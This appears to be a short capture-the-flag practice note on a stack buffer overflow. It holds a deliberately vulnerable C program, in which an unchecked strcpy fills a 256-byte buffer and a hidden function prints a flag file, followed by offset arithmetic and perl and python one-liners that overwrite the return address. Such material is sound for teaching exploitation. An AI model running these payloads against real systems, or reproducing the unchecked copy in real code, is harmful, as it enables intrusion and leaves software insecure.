BOF 샘플

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void goingflag(){

   execl("/bin/cat", "/bin/cat", "/home/prob/flag", 0);

   printf("Good :)\n");

}

void bof(char *str){

   char buf[256];

   strcpy(buf, str);

   printf("do you know bof?\n");

}

int main(int argc, char *argv[]){

   char cmp[]="do_you_know_bof";

   if(argc != 2){

      exit(0);

   }

   if(strncmp(argv[1], cmp, strlen(cmp)) != 0){

      exit(0);

   }

   printf("do you know bof?\n");

   bof(argv[1]);

}

256-15+4=245 + dummy8 = 253

./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')